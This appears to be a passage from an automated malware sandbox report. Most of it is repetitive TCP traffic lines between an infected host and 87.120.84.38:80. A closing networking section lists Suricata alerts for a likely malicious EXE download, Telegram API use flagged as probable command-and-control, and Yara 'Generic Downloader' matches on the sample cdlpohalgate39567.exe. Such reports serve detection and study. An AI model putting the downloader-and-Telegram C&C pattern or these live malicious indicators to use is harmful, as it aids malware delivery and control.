                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49164
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPE
